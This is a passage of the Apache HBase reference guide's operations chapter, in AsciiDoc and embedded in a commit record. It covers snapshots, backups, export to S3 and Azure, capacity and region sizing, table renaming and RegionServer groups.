the usage of that file. 
Similarly, when a table is duplicated via a snapshot\nand `restore_snapshot`, the new table will not consume any quota size until the original table stops referring\nto the files, either due to a compaction on the original table, a compaction on the new table, or the\noriginal table being deleted.\n\nOne new HBase shell command was added to inspect the computed sizes of each snapshot in an HBase instance.\n\n----\nhbase> list_snapshot_sizes\nSNAPSHOT SIZE\n t1.s1 1159108\n----\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used as a back-end analytic capacity and not serving front-end web-pages.\nThe benefits are that the NameNode\/Master and RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp can be used to copy the contents of the HBase directory in HDFS either to the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part) not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:https:\/\/hbase.apache.org\/book.html#_cluster_replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, clone, and restore operations don't involve data copying.\nAlso, exporting a snapshot to another cluster doesn't have an impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to backup or to clone a table was to use 
CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, which means no reads or writes; this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on snapshot support, just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,xml]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (printing their names and related information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since Replication works at the log level and snapshots at the file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to a misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data you need from the clone to the main one.\n\n
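For instance, assuming the damaged table is `myTable`, a simplified sketch of this recovery path using `clone_snapshot` and the <<copy.table,copytable>> utility (CopyTable copies the whole clone; a custom Map-Reduce job would let you copy only the rows you need):\n\n----\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myTableClone'\nhbase> exit\n\n# Copy the clone's contents back into the live table\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --new.name=myTable myTableClone\n----\n\n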
[[ops.snapshots.acls]]\n=== Snapshot operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at the file-system level, the HBase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nYou can store and retrieve snapshots from Amazon S3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. 
The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n=== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blob Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See https:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacing the protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from the logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n+\n** See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values mean more relative overhead.\n** KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see 
<<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nThe number of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlan for peak load if it is likely that load will be the main driver of node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test a single node or a test cluster.\n\nFor writes, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nAn RS cannot currently utilize a very large heap due to the cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally, fewer regions make for a smoother-running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region count given the table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories under \/hbase\/<table>\/ in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. 
<<too_many_regions,too many regions>> has a technical discussion of the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in the 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as an unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS as a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\n
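As a quick sanity check of the arithmetic for that 16 GB example (a sketch using the illustrative default values above, with the 0.4 memstore fraction written as 4\/10 for integer shell math):\n\n[source,bash]\n----\n# 16384 MB heap * 0.4 global memstore fraction \/ 128 MB flush size \/ 1 column family\n$ echo $(( 16384 * 4 \/ 10 \/ 128 ))\n51\n----\n\n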
This number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workloads, the memstore fraction can be increased in configuration at the expense of block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node cluster your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200MB of data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor the older 0.90.x codebase, the upper bound of region size is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nWhen starting off, if you cannot estimate the size of your tables well, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually splitting hot regions to spread the load over the cluster), or going with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, an experimental stripe compactions feature was added that allows for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to the above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing a high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per region.\nThe minimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to a higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such a case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>.\n\n
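As a sketch of what such overrides can look like per table in the shell (the table name and values are illustrative, and this assumes your HBase version supports the `CONFIGURATION` attribute of `alter`):\n\n----\nhbase> alter 'mytable', CONFIGURATION => {'hbase.hstore.compaction.min' => '5',\n 'hbase.hstore.blockingStoreFiles' => '20'}\n----\n\n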
[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor a pre-splitting how-to, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n\n
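For example, a table can be created pre-split into a given number of regions with one of the built-in split algorithms (a sketch; the table and column family names are illustrative):\n\n----\nhbase> create 'mytable', 'cf', {NUMREGIONS => 15, SPLITALGO => 'HexStringSplit'}\n----\n\n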
[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility to rename a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, TableName oldTableName, TableName newTableName) throws IOException {\n \/\/ Use a unique, throwaway snapshot name; randomName() is a stand-in for your own helper\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n\n[[rsgroup]]\n== RegionServer Grouping\nRegionServer Grouping (A.K.A `rsgroup`) is an advanced feature for\npartitioning regionservers into distinct groups for strict isolation. It\nshould only be used by users who are sophisticated enough to understand the\nfull implications and have a sufficient background in managing HBase clusters.\nIt was developed by Yahoo! and they run it at scale on their large grid cluster.\nSee link:http:\/\/www.slideshare.net\/HBaseCon\/keynote-apache-hbase-at-yahoo-scale[HBase at Yahoo! Scale].\n\nRSGroups can be defined and managed with shell commands or corresponding Java\nAPIs. A server can be added to a group with a hostname and port pair, and tables\ncan be moved to this group so that only regionservers in the same rsgroup can\nhost the regions of the table. RegionServers and tables can only belong to one\nrsgroup at a time. By default, all tables and regionservers belong to the\n`default` rsgroup. System tables can also be put into an rsgroup using the regular\nAPIs. A custom balancer implementation tracks assignments per rsgroup and makes\nsure to move regions to the relevant regionservers in that rsgroup. The rsgroup\ninformation is stored in a regular HBase table, and a zookeeper-based read-only\ncache is used at cluster bootstrap time.\n\nTo enable, add the following to your hbase-site.xml and restart your Master:\n\n[source,xml]\n----\n <property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupAdminEndpoint<\/value>\n <\/property>\n <property>\n <name>hbase.master.loadbalancer.class<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupBasedLoadBalancer<\/value>\n <\/property>\n----\n\nThen use the shell _rsgroup_ commands to create and manipulate RegionServer\ngroups: e.g. to add a rsgroup and then add a server to it. To see the list of\nrsgroup commands available in the hbase shell type:\n\n[source, bash]\n----\n hbase(main):008:0> help 'rsgroup'\n Took 0.5610 seconds\n----\n\nAt a high level, you create an rsgroup other than the `default` group using the\n_add_rsgroup_ command. You then add servers and tables to this group with the\n_move_servers_rsgroup_ and _move_tables_rsgroup_ commands. If tables are slow to\nmigrate to the group's dedicated servers, run a balance for the group with the\n_balance_rsgroup_ command (usually this is not needed). To\nmonitor the effect of the commands, see the `Tables` tab toward the end of the\nMaster UI home page. If you click on a table, you can see what servers it is\ndeployed across. You should see here a reflection of the grouping done with\nyour shell commands. View the Master log if you run into issues.\n\nHere is an example using a few of the rsgroup commands. To add a group, do as follows:\n\n[source, bash]\n----\n hbase(main):008:0> add_rsgroup 'my_group'\n Took 0.5610 seconds\n----\n\n\n.RegionServer Groups must be Enabled\n[NOTE]\n====\nIf you have not enabled the rsgroup Coprocessor Endpoint in the master and\nyou run any of the rsgroup shell commands, you will see an error message\nlike the one below:\n\n[source,java]\n----\nERROR: org.apache.hadoop.hbase.exceptions.UnknownProtocolException: No registered master coprocessor service found for name RSGroupAdminService\n at org.apache.hadoop.hbase.master.MasterRpcServices.execMasterService(MasterRpcServices.java:604)\n at org.apache.hadoop.hbase.shaded.protobuf.generated.MasterProtos$MasterService$2.callBlockingMethod(MasterProtos.java)\n at org.apache.hadoop.hbase.ipc.RpcServer.call(RpcServer.java:1140)\n at org.apache.hadoop.hbase.ipc.CallRunner.run(CallRunner.java:133)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:277)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:257)\n----\n====\n\nAdd a server (specified by hostname + port) to the just-made group using the\n_move_servers_rsgroup_ command as follows:\n\n[source, bash]\n----\n hbase(main):010:0> move_servers_rsgroup 'my_group',['k.att.net:51129']\n----\n\n
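Tables are moved to the group in the same fashion, with the _move_tables_rsgroup_ command (a sketch; the table name is illustrative):\n\n[source, bash]\n----\n hbase(main):011:0> move_tables_rsgroup 'my_group',['myTable']\n----\n\n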
.Hostname and Port vs ServerName\n[NOTE]\n====\nThe rsgroup feature refers to servers in a cluster with hostname and port only.\nIt does not make use of the HBase ServerName type identifying RegionServers;\ni.e. hostname + port + starttime to distinguish RegionServer instances. The\nrsgroup feature keeps working across RegionServer restarts so the starttime of\nServerName -- and hence the ServerName type -- is not appropriate.\n====\n\n=== Administration\n\nServers come and go over the lifetime of a cluster. Currently, you must\nmanually align the servers referenced in rsgroups with the actual state of\nnodes in the running cluster. What we mean by this is that if you decommission\na server, then you must update rsgroups as part of your server decommission\nprocess, removing references.\n\nBut, there is no _remove_offline_servers_rsgroup_ command, you say!\n\nThe way to remove a server is to move it to the `default` group. The `default`\ngroup is special. All rsgroups except the `default` rsgroup are static, in that\nedits via the shell commands are persisted to the system `hbase:rsgroup` table.\nIf they reference a decommissioned server, then they need to be updated to undo\nthe reference.\n\nThe `default` group is not like other rsgroups in that it is dynamic. Its server\nlist mirrors the current state of the cluster; i.e. if you shutdown a server that\nwas part of the `default` rsgroup, and then do a _get_rsgroup_ `default` to list\nits content in the shell, the server will no longer be listed. For non-`default`\ngroups, though a node may be offline, it will persist in the non-`default` group's\nlist of servers. But if you move the offline server from the non-`default` rsgroup\nto `default`, it will not show in the `default` list. It will just be dropped.\n\n=== Best Practice\nThe authors of the rsgroup feature, the Yahoo! HBase Engineering team, have been\nrunning it on their grid for a good while now and have come up with a few best\npractices informed by their experience.\n\n==== Isolate System Tables\nEither have a system rsgroup where all the system tables are, or just leave the\nsystem tables in the `default` rsgroup and keep all user-space tables in\nnon-`default` rsgroups.\n\n==== Dead Nodes\nYahoo! has found it useful at their scale to keep a special rsgroup of dead or\nquestionable nodes; this is one means of keeping them out of the running until repair.\n\nBe careful replacing dead nodes in an rsgroup. Ensure there are enough live nodes\nbefore you start moving out the dead. 
Move in good live nodes first if you have to.\n\n=== Troubleshooting\nViewing the Master log will give you insight on rsgroup operation.\n\nIf it appears stuck, restart the Master process.\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29c46c4834a3f96e9fca33cb16bc7f3748fcd60c","subject":"HBASE-15985 clarify promises about edits from replication in ref guide","message":"HBASE-15985 clarify promises about edits from replication in ref guide\n\nSigned-off-by: Andrew Purtell <b91237ce35d325aea9eacb2c17af89139c6c9289@apache.org>\n","repos":"Eshcar\/hbase,apurtell\/hbase,vincentpoon\/hbase,apurtell\/hbase,HubSpot\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,Apache9\/hbase,mahak\/hbase,bijugs\/hbase,ndimiduk\/hbase,ultratendency\/hbase,HubSpot\/hbase,JingchengDu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,bijugs\/hbase,apurtell\/hbase,ultratendency\/hbase,francisliu\/hbase,bijugs\/hbase,HubSpot\/hbase,JingchengDu\/hbase,mahak\/hbase,bijugs\/hbase,francisliu\/hbase,ndimiduk\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,francisliu\/hbase,ndimiduk\/hbase,HubSpot\/hbase,bijugs\/hbase,Eshcar\/hbase,Eshcar\/hbase,JingchengDu\/hbase,mahak\/hbase,ndimiduk\/hbase,apurtell\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,francisliu\/hbase,francisliu\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,gustavoanatoly\/hbase,gustavoanatoly\/hbase,ultratendency\/hbase,Apache9\/hbase,HubSpot\/hbase,apurtell\/hbase,Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,vincentpoon\/hbase,mahak\/hbase,francisliu\/hbase,bijugs\/hbase,ndimiduk\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,ndimiduk\/hbase,Apache9\/hbase,ultratendency\/hbase,HubSpot\/hbase,apurtell\/hbase,Eshcar\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,mahak\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,bijugs\/hbase,mahak\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,francisliu\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ndimiduk\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,ultratendency\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,gustavoanatoly\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,mahak\/hbase,mahak\/hbase,HubSpot\/hbase,Apache9\/hbase,apurtell\/hbase,Apache9\/hbase,Eshcar\/hbase,Eshcar\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,mahak\/hbase,Eshcar\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,JingchengDu\/hbase,francisliu\/hbase,Apache9\/hbase,JingchengDu\/hbase,bijugs\/hbase,francisliu\/hbase,Apache9\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,HubSpot\/hbase,mahak\/hbase,JingchengDu\/hbase,Apache9\/hbase,vincentpoon\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_contents":"\/\/\/\/\n\/**\